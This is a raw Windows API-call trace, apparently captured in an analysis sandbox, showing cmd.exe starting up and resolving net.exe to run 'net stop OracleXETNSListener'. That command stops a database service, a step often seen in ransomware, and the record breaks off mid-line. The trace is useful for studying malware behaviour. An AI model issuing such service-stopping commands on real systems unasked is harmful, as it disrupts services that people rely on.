[0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x40, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x40, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x40, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.726] RegCloseKey (hKey=0x68) returned 0x0 [0061.726] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bedfc | out: phkResult=0x1bedfc*=0x68) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x40, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x1, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x1, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x0, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x9, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x9, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.727] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x9, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.727] RegCloseKey (hKey=0x68) returned 0x0 [0061.727] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebae [0061.727] srand (_Seed=0x5d97ebae) [0061.727] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleXETNSListener" [0061.727] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleXETNSListener" [0061.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.727] GetProcessHeap () returned 0x5d0000 [0061.727] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e2048 [0061.727] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2050, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0061.727] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.727] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.727] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.727] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0061.727] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0061.727] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0061.727] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0061.727] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0061.727] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0061.727] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0061.728] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0061.728] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0061.728] GetProcessHeap () returned 0x5d0000 [0061.728] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2b20 | out: hHeap=0x5d0000) returned 1 [0061.728] GetEnvironmentStringsW () returned 0x5e2260* [0061.728] GetProcessHeap () returned 0x5d0000 [0061.728] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xae2) returned 0x5e4bc0 [0061.728] FreeEnvironmentStringsW (penv=0x5e2260) returned 1 [0061.728] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0061.728] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.728] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0061.728] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0061.728] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0061.728] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0061.728] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0061.728] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0061.728] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0061.728] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0061.728] GetProcessHeap () returned 0x5d0000 [0061.728] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e56b0 [0061.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1bfbc8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1bfbc8, lpFilePart=0x1bfbc4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1bfbc4*="Desktop") returned 0x25 [0061.728] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.728] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1bf944 | out: lpFindFileData=0x1bf944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e1ec8 [0061.729] FindClose (in: hFindFile=0x5e1ec8 | out: hFindFile=0x5e1ec8) returned 1 [0061.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1bf944 | out: lpFindFileData=0x1bf944*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e1ec8 [0061.729] FindClose (in: hFindFile=0x5e1ec8 | out: hFindFile=0x5e1ec8) returned 1 [0061.729] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0061.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1bf944 | out: lpFindFileData=0x1bf944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e1ec8 [0061.729] FindClose (in: hFindFile=0x5e1ec8 | out: hFindFile=0x5e1ec8) returned 1 [0061.729] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.729] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0061.729] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0061.729] GetProcessHeap () returned 0x5d0000 [0061.729] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4bc0 | out: hHeap=0x5d0000) returned 1 [0061.729] GetEnvironmentStringsW () returned 0x5e40d0* [0061.729] GetProcessHeap () returned 0x5d0000 [0061.729] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e5f10 [0061.729] FreeEnvironmentStringsW (penv=0x5e40d0) returned 1 [0061.729] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.729] GetProcessHeap () returned 0x5d0000 [0061.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e56b0 | out: hHeap=0x5d0000) returned 1 [0061.730] GetProcessHeap () returned 0x5d0000 [0061.730] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e6a50 [0061.730] GetProcessHeap () returned 0x5d0000 [0061.730] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x46) returned 0x5e1ec8 [0061.730] GetProcessHeap () returned 0x5d0000 [0061.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a50 | out: hHeap=0x5d0000) returned 1 [0061.730] GetConsoleOutputCP () returned 0x1b5 [0061.831] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.831] GetUserDefaultLCID () returned 0x409 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1bfd08, cchData=128 | out: lpLCData="0") returned 2 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1bfd08, cchData=128 | out: lpLCData="0") returned 2 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1bfd08, cchData=128 | out: lpLCData="1") returned 2 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0061.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0061.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0061.833] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0061.834] GetProcessHeap () returned 0x5d0000 [0061.834] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2dd8 [0061.834] GetConsoleTitleW (in: lpConsoleTitle=0x5e2dd8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.834] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0061.834] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0061.835] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0061.835] GetProcessHeap () returned 0x5d0000 [0061.835] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e6a50 [0061.835] GetProcessHeap () returned 0x5d0000 [0061.835] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a50 | out: hHeap=0x5d0000) returned 1 [0061.835] _wcsicmp (_String1="net", _String2=")") returned 69 [0061.835] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0061.835] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0061.835] _wcsicmp (_String1="IF", _String2="net") returned -5 [0061.835] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0061.835] _wcsicmp (_String1="REM", _String2="net") returned 4 [0061.835] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0061.835] GetProcessHeap () returned 0x5d0000 [0061.835] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e2ff0 [0061.836] GetProcessHeap () returned 0x5d0000 [0061.836] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x10) returned 0x5dff20 [0061.836] GetProcessHeap () returned 0x5d0000 [0061.836] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e3050 [0061.837] GetConsoleTitleW (in: lpConsoleTitle=0x1bfa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.837] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0061.837] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0061.837] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0061.837] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0061.837] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0061.837] _wcsicmp (_String1="net", _String2="CD") returned 11 [0061.837] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0061.837] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0061.837] _wcsicmp (_String1="net", _String2="REN") returned -4 [0061.837] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0061.837] _wcsicmp (_String1="net", _String2="SET") returned -5 [0061.837] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0061.837] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0061.837] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0061.837] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0061.837] _wcsicmp (_String1="net", _String2="MD") returned 1 [0061.837] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0061.837] _wcsicmp (_String1="net", _String2="RD") returned -4 [0061.837] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0061.837] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0061.838] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0061.838] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0061.838] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0061.838] _wcsicmp (_String1="net", _String2="VER") returned -8 [0061.838] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0061.838] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0061.838] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0061.838] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0061.838] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0061.838] _wcsicmp (_String1="net", _String2="START") returned -5 [0061.838] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0061.838] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0061.838] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0061.838] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0061.838] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0061.838] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0061.838] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0061.838] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0061.838] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0061.838] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0061.838] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0061.838] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0061.838] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0061.838] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="CD") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0061.838] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0061.838] _wcsicmp (_String1="net", _String2="REN") returned -4 [0061.838] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0061.838] _wcsicmp (_String1="net", _String2="SET") returned -5 [0061.838] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0061.838] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0061.838] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0061.839] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0061.839] _wcsicmp (_String1="net", _String2="MD") returned 1 [0061.839] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0061.839] _wcsicmp (_String1="net", _String2="RD") returned -4 [0061.839] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0061.839] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0061.839] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0061.839] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0061.839] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0061.839] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0061.839] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0061.839] _wcsicmp (_String1="net", _String2="VER") returned -8 [0061.839] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0061.839] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0061.839] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0061.839] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0061.839] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0061.839] _wcsicmp (_String1="net", _String2="START") returned -5 [0061.839] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0061.839] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0061.839] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0061.839] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0061.839] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0061.839] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0061.839] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0061.839] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0061.839] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0061.839] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0061.839] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0061.839] _wcsicmp (_String1="net", _String2="IF") returned 5 [0061.839] _wcsicmp (_String1="net", _String2="REM") returned -4 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e3098 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x44) returned 0x5e32b0 [0061.840] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x418) returned 0x5d07f0 [0061.840] SetErrorMode (uMode=0x0) returned 0x0 [0061.840] SetErrorMode (uMode=0x1) returned 0x0 [0061.840] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5d07f8, lpFilePart=0x1bf520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1bf520*="Desktop") returned 0x25 [0061.840] SetErrorMode (uMode=0x0) returned 0x1 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d07f0, Size=0x5c) returned 0x5d07f0 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d07f0) returned 0x5c [0061.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.840] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x120) returned 0x5e3300 [0061.840] GetProcessHeap () returned 0x5d0000 [0061.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x238) returned 0x5d0858 [0061.846] GetProcessHeap () returned 0x5d0000 [0061.847] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d0858, Size=0x122) returned 0x5d0858 [0061.847] GetProcessHeap () returned 0x5d0000 [0061.847] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d0858) returned 0x122 [0061.847] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.847] GetProcessHeap () returned 0x5d0000 [0061.847] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe0) returned 0x5e3428 [0061.847] GetProcessHeap () returned 0x5d0000 [0061.847] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e3428, Size=0x76) returned 0x5e3428 [0061.847] GetProcessHeap () returned 0x5d0000 [0061.847] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e3428) returned 0x76 [0061.848] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.848] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1bf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf29c) returned 0xffffffff [0061.848] GetLastError () returned 0x2 [0061.848] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x1bf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf29c) returned 0xffffffff [0061.849] GetLastError () returned 0x2 [0061.849] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1bf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf29c) returned 0x5e34a8 [0061.849] GetProcessHeap () returned 0x5d0000 [0061.849] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e34e8 [0061.849] FindClose (in: hFindFile=0x5e34a8 | out: hFindFile=0x5e34a8) returned 1 [0061.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x1bf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf29c) returned 0xffffffff [0061.849] GetLastError () returned 0x2 [0061.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x1bf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf29c) returned 0x5e34a8 [0061.849] GetProcessHeap () returned 0x5d0000 [0061.849] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e34e8, Size=0x4) returned 0x5e34e8 [0061.849] FindClose (in: hFindFile=0x5e34a8 | out: hFindFile=0x5e34a8) returned 1 [0061.849] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0061.849] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0061.849] GetConsoleTitleW (in: lpConsoleTitle=0x1bf794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.850] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf61c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf6e4 | out: lpAttributeList=0x1bf61c, lpSize=0x1bf6e4) returned 1 [0061.850] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf61c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bf6dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf61c, lpPreviousValue=0x0) returned 1 [0061.850] GetStartupInfoW (in: lpStartupInfo=0x1bf5d8 | out: lpStartupInfo=0x1bf5d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0061.850] GetProcessHeap () returned 0x5d0000 [0061.850] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5e34a8 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0061.850] 